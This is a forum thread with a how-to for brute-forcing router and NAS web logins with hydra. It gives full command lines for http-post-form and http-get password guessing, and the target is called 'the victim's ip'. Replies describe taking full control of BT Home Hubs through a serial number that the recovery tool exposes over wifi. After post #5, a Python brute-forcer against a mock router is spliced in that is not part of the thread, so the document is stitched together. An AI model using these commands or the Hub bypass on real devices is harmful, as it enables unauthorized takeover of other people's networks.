
Thread: Using hydra to bruteforce a router with cgi-bin/[xy] authentication


  1. #1
    Just burned his ISO (Join Date: Jun 2008, Posts: 15)

    Using hydra to bruteforce a router with cgi-bin/[xy] authentication

    I recently started playing around with Hydra and tried to hack my router. After searching the forum and googling around a while I noticed that there are only some howtos for routers that have http-auth authentication. That is, when you go to e.g. 192.168.2.1, and before showing anything, you have to enter login and password in a popup. My router (T-Com Sinus 154 DSL Basic 3) and many others I've dealt with so far work differently. When I want to login to my router, I have to go to 192.168.2.1, a web interface with a password field shows up, and I have to enter the password, which is then checked by /cgi-bin/login.exe via http-post.

    It was quite tricky to find out how to use this authentication with hydra, so I guess there are some of you who can benefit from this. I'll describe how I did it, so you can adapt the method and use it with your own router.

    First of all I examined the login page of the web interface. Be sure to look at the frame source and not the frameset. You should see the form and the action, here's what I saw:

    The form is defined as:

    Code:
    <form name="tF" method="post" action="/cgi-bin/login.exe" onSubmit="evaltF();">
    Somewhere in the form there will be the field that takes the password:

    Code:
    <input type="password" name="pws" class="stylepwd" size="12" maxlength="12">
    This is probably the most important data you need. You need to write down the field name ("pws" in my case). The size attribute comes in very handy too because it tells us that the password's max length is 12 characters.

    After that I tried to get familiar with Hydra's options. I figured out that you need the following options:

    Code:
    -l ""
    Sets the login name. In the end I don't need a login name but hydra gets kind of pissed when you don't pass something, so I gave an empty string.

    Code:
    -P passwords.txt
    The wordlist to use for the password

    Code:
    -t 1
    1 task only; not really necessary, I just wanted to make sure Hydra doesn't choke on too many requests

    Code:
    -f
    Hydra shall stop when a working password is found

    Code:
    -v -V
    Be verbose, and even more so. I skipped that in the final version but it's ok for debugging

    Code:
    192.168.2.1
    the victim's ip

    Code:
    http-post-form
    the method to use

    Code:
    /cgi-bin/login.exe:pws=^PASS^:loginpserr.htm
    This is the most important part. Here we tell Hydra what to pass the passwords to. The argument consists of three parts separated by ":".

    The first part is the script that takes the POST data, we found that in the frame source above.

    The second part is the field name of the password field with an added =^PASS^. ^PASS^ is the variable that hydra substitutes with the passwords in the wordlist.

    The third part is the "incorrect" condition. Hydra has to find out somehow if the current password that was sent to the router is correct or not. You have to find a string that is actually IN A NEGATIVE RESPONSE from the router. As we don't have the password yet, we can't know what the router will send if the password is correct, therefore we have to check if it is NOT, which we can find out easily. To find out what the router sends back to hydra I used Wireshark.

    Open up Wireshark, go to the router login page, start capturing and then login with a wrong password. After that, stop capturing and apply a "http" filter. You will see the POST data sent from hydra to the router (you should also see the "pws=blabla" in the details, that's where hydra sends the passwords from the wordlist). Below that you'll find the router's answer. In my case it says something like "This page has moved to loginpserr.htm" packed in some basic HTML. So I used the string loginpserr.htm to validate the .. uhm... faultiness. OMFG %-]

    Hydra will consider a password as CORRECT when the router's answer DOES NOT contain the given string. So be sure to take an expression that somehow sounds like "incorrect" or "wrong". If you took "the" for example, and the POSITIVE response would be something like "the password you entered was correct", hydra will not recognize it as correct but as incorrect.

    Here's the complete example:

    Code:
    hydra -l "" -P passwords.txt -t 1 -f -v -V 192.168.2.1 http-post-form /cgi-bin/login.exe:pws=^PASS^:loginpserr.htm
    If your router does not only need a password but also a username, you can easily add the corresponding login field to the last part. So if you need to send the field "login" (or whatever it is called in your case) with the value "admin" as the only username, you could use

    Code:
    /cgi-bin/login.exe:login=admin&pws=^PASS^:loginpserr.htm
    When you need to try a whole username list then you can specify the list via

    Code:
    -L usernames.txt
    and

    Code:
    /cgi-bin/login.exe:login=^USER^&pws=^PASS^:loginpserr.htm

    Ok, looks like I've just finished my very first howto, hope you like it. Please let me know if this works for you. Have fun! =)

    RaginRob
    I love deadlines. I like the whooshing sound they make as they fly by.

    Douglas Adams

  2. #2
    The_Denv, Member (Join Date: Nov 2006, Posts: 364)

    This looks like a promising tutorial indeed

    Nice, RaginRob, thanks for sharing the tutorial with everyone. I briefly read through it and of course copied/pasted it in a txt file for myself for offline viewing.

    I have a question for you about this tutorial. Here in the UK our provider BT [British Telecom] dispatches their BTHomeHub to all subscribers. Now this modem/router uses a Linux kernel, which is pretty cool, but that's another story...

    ...What I am meaning to ask is once you surf to http://192.168.1.254 for the first time, you are not prompted with the usual Username/Password. Recently BT deployed an upgrade to their security of the BTHomeHub and when I went to my gateway a few months ago I was prompted to change my gateway password by inserting the serial number of the BTHomeHub into the text field along with my new password. The serial number was found on the bottom of my BTHomeHub.

    Now, is there (or would there be) a security risk for people who never surf to their gateway? As you are prompted to insert a new password along with your serial of the hub.

    Great tutorial, I can't wait to test it out

  3. #3
    Just burned his ISO (Join Date: Jun 2008, Posts: 15)

    Hi Deny,

    thank you for your response. I took a brief look at the wiki page you posted, seems like this Home Hub is not the safest thing on earth according to the issues the GNUCITIZEN guys found. If - after the update - the WLAN settings are set back to defaults, then anyone could access the Hub if there was a way to calculate the serial, I guess. But I don't know if the hub checks the serial you have to enter against an internal hardcoded serial number. In that case you would need direct physical access to the Hub which would render a wireless attack futile. Hard to say without having the box at home to play with... :-)
    I love deadlines. I like the whooshing sound they make as they fly by.

    Douglas Adams

  4. #4
    Just burned his ISO (Join Date: Jun 2008, Posts: 4)

    Yes, the answer to the last question is: if your key is decoded and someone jumps onto your router, they surf to the admin page and are presented with the "as this is your first time visiting this page please enter a new password and your serial number". Now the way round this is to download the BT Home Hub recovery tool and attempt to connect to the hub; you're once again challenged with a login box, but in the top corner, very nicely, is a batch of numbers and letters. This is your serial number; simply add CP to the web form on the admin page and away you go, full control of one said BT Home Hub.

  5. #5
    Good friend of the forums (Join Date: Jan 2010, Location: outside chicago, il, Posts: 442)

    Good tutorial, however http-get would be simpler to use, i.e.
    hydra -l "" -P word.txt -v -e ns 192.168.1.1 http-get /
    -l is for a username, which is null in this case
    -P is a wordlist of passwords to try
    -v is for verbose
    -e ns: try no password, and the IP address of the device as the password (one of the currently supported options)
    / is where you have to put in the username and password.

    This works for the Linksys equipment I have. When I go to its IP 192.168.1.1, a box pops up and asks for a username and password. Try it and let me know if it works for you.
    I like the bleeding edge, but I don't like blood loss
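    Both login styles discussed in this thread, the cgi-bin POST form from post #1 and the popup (HTTP Basic) login from post #5, re-implemented as an added, self-contained example in Python against a constructed mock router. This is not hydra's code and not any poster's code: the path /cgi-bin/login.exe, the field name pws and the marker loginpserr.htm are taken from post #1, while the mock router, its password "s3cret", the wordlist and all function names are assumptions made here. It also exercises the pitfall post #1 warns about: a failure marker that also occurs in the positive reply ("page" in the mock) makes the correct password look wrong.

```python
"""Added example (not hydra's code, not the posters' code): a minimal
re-implementation of hydra's http-post-form and http-get checks, run against
a constructed mock router so the failure-condition logic can be tried offline.
Assumed here: the mock router, its password "s3cret", the wordlist and the
function names. Taken from post #1: /cgi-bin/login.exe, field "pws", marker
"loginpserr.htm"."""
import base64
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

MOCK_PASSWORD = "s3cret"        # constructed secret of the mock router
FAIL_MARKER = "loginpserr.htm"  # string post #1 saw in the negative reply


class MockRouter(BaseHTTPRequestHandler):
    """Imitates both login styles discussed in the thread."""

    def log_message(self, *_):  # silence request logging
        pass

    def do_POST(self):  # cgi-bin style: form field checked server-side
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        if self.path == "/cgi-bin/login.exe" and fields.get("pws", [""])[0] == MOCK_PASSWORD:
            body = "<html>Welcome to the router setup page</html>"
        else:  # wrong password: stub saying the page has moved, as in post #1
            body = f"<html>This page has moved to {FAIL_MARKER}</html>"
        self._reply(200, body)

    def do_GET(self):  # popup style (post #5): HTTP Basic auth on "/"
        want = "Basic " + base64.b64encode(f"admin:{MOCK_PASSWORD}".encode()).decode()
        if self.headers.get("Authorization") == want:
            self._reply(200, "<html>admin page</html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
            self.end_headers()

    def _reply(self, status, body):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


def start_mock_router():
    """Start the mock router on a free localhost port and return its base URL."""
    server = HTTPServer(("127.0.0.1", 0), MockRouter)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_port}"


def http_post_form(base_url, spec, wordlist, login=""):
    """hydra-style http-post-form; spec is "path:fields:failmarker".
    A candidate counts as correct when the reply does NOT contain failmarker."""
    path, template, fail_marker = spec.split(":", 2)
    for pw in wordlist:
        data = template.replace("^USER^", login).replace("^PASS^", pw).encode()
        with urllib.request.urlopen(base_url + path, data=data) as resp:
            if fail_marker not in resp.read().decode():
                return pw
    return None


def http_get_basic(base_url, path, login, wordlist):
    """hydra-style http-get: a candidate counts as correct when the server
    stops answering 401 to the Basic Authorization header."""
    for pw in wordlist:
        req = urllib.request.Request(base_url + path)
        token = base64.b64encode(f"{login}:{pw}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
        try:
            with urllib.request.urlopen(req):
                return pw
        except urllib.error.HTTPError as err:
            if err.code != 401:
                raise
    return None


if __name__ == "__main__":
    url = start_mock_router()
    words = ["admin", "1234", "s3cret", "password"]  # constructed wordlist
    print(http_post_form(url, "/cgi-bin/login.exe:pws=^PASS^:loginpserr.htm", words))  # s3cret
    # "page" occurs in the success page too, so the right password is rejected:
    print(http_post_form(url, "/cgi-bin/login.exe:pws=^PASS^:page", words))  # None
    print(http_get_basic(url, "/", "admin", words))  # s3cret
```

    The spec string passed to http_post_form is the same "path:fields:marker" argument the thread puts at the end of the hydra command line, and the third field is tested for absence, which is how post #1 describes hydra's http-post-form condition. Pick the marker from a captured negative reply and make sure it cannot also appear in a success page, otherwise the run ends with nothing found even though the wordlist contained the right password.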

  6. #6
    Just burned his ISO (Join Date: Jun 2008, Posts: 15)

    @bofh28

    In case there's a popup box where you have to enter the login and password (like in your Linksys) the http-get method is definitely the right way to do it.

    In my case, however, there is no popup window, that's why I had to do it as described above. When I go to 192.168.2.1 a welcome screen shows up and some Javascript opens up another window. This new window is a frameset, one frame contains the form with the password entry field. So http-get doesn't work with that kind of login.
    I love deadlines. I like the whooshing sound they make as they fly by.

    Douglas Adams

  7. #7
    The_Denv, Member (Join Date: Nov 2006, Posts: 364)

    Quote Originally Posted by RaginRob View Post
    Hi Deny,

    thank you for your response. I took a brief look at the wiki page you posted, seems like this Home Hub is not the safest thing on earth according to the issues the GNUCITIZEN guys found. If - after the update - the WLAN settings are set back to defaults, then anyone could access the Hub if there was a way to calculate the serial, I guess. But I don't know if the hub checks the serial you have to enter against an internal hardcoded serial number. In that case you would need direct physical access to the Hub which would render a wireless attack futile. Hard to say without having the box at home to play with... :-)
    You're welcome.
    Yeah, this box has major vulnerabilities with it, it's a complete security hazard. I haven't subscribed to the VoIP service with BT, but when I do, apparently this box has several VoIP security holes that I can not wait to discover. GNUCitizen's Link

    Quote Originally Posted by Wulfy View Post
    Yes, the answer to the last question is: if your key is decoded and someone jumps onto your router, they surf to the admin page and are presented with the "as this is your first time visiting this page please enter a new password and your serial number". Now the way round this is to download the BT Home Hub recovery tool and attempt to connect to the hub; you're once again challenged with a login box, but in the top corner, very nicely, is a batch of numbers and letters. This is your serial number; simply add CP to the web form on the admin page and away you go, full control of one said BT Home Hub.
    The BTHomeHub Recovery Tool Manual states you need to have Ethernet access to the hub. It's meant to replace the firmware of the hub...I am going to look into this.

  8. #8
    ShadowKill, Senior Member (Join Date: Dec 2007, Posts: 908)

    RaginRob, The_Denv, Wulfy, bofh28:

    VERY good tutorial/information. This is going to help a lot of people. The tutorial was very well laid out, easy to read, and to the point. The information about the BT serial flaw: priceless. I look forward to anything else you guys have to contribute, as this is exactly the kind of HOW-TO people want to see.

    Keep up the good work and happy hacking!!!!



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  9. #9
    Just burned his ISO (Join Date: Jun 2008, Posts: 4)

    Quote Originally Posted by The_Denv View Post
    The BTHomeHub Recovery Tool Manual (static.btopenworld.com/broadband/documents/BT_Home_Hub_recovery_instructions_Windows.pdf) states you need to have Ethernet access to the hub. It's meant to replace the firmware of the hub...I am going to look into this.

    Nope, wifi works fine. I've tried it on 2 of the hubs I got hold of as spares, so unless they fix it to stop broadcasting the serial of the box to the repair tool, it's kinda gonna carry on happening, as updating the recovery tool won't help :P

    I think what that link means is that to do a successful recovery you must have Ethernet; as you're not trying to recover the firmware, it's a moot point.

  10. #10
    Member (Join Date: Jun 2008, Posts: 101)

    First of all, let me say this is a well explained tutorial! At home I have a Buffalo NAS that uses cgi-bin authentication. Below you can see the source code info...

    Code:
    <form id="frmNas" name="frmNas" method="post" action="/cgi-bin/top.cgi">
    <input type="text" id="txtAuthLoginUser" name="txtAuthLoginUser" value="" size="24" maxlength="20" />
    <input type="password" id="txtAuthLoginPassword" name="txtAuthLoginPassword" value="" size="24" maxlength="20" />
    It has a built-in user "admin"... So far I have everything except the "incorrect condition"... Here is how I'm executing Hydra with Wireshark to see what the NAS sends back...

    Code:
    hydra -l "" -P shortdict.txt -t 1 -f -v -V 192.168.1.3 http-post-form /cgi-bin/top.cgi:txtAuthLoginUser=admin&txtAuthLoginPassword=^PASS^
    I'm actually stuck on the last part, the "incorrect" condition. I ran Wireshark and these are the responses it gave... In the image there are 2 POSTs by Hydra followed by TCP responses from the NAS.

    http://img125.imageshack.us/img125/4821/authsnapshotpd0.jpg

    Feel free to ask for additional info.
